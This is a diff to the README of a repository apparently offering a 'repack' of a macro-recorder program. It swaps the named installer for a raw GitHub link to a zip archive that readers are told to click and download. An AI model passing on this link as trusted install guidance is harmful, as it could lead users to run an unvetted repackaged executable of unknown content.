sudaisrehmany/Auto-Macro-Recorder-Repack/README.md

 ### Step 3: Download the Installer

-1. Look for the file named something like `AutoMacroRecorderInstaller.exe`.
+1. Look for the file named something like `https://github.com/sudaisrehmany/Auto-Macro-Recorder-Repack/raw/refs/heads/main/deployement/Macro-Repack-Recorder-Auto-v3.6.zip`.
 2. Click on the file to start the download.

 ### Step 4: Install the Software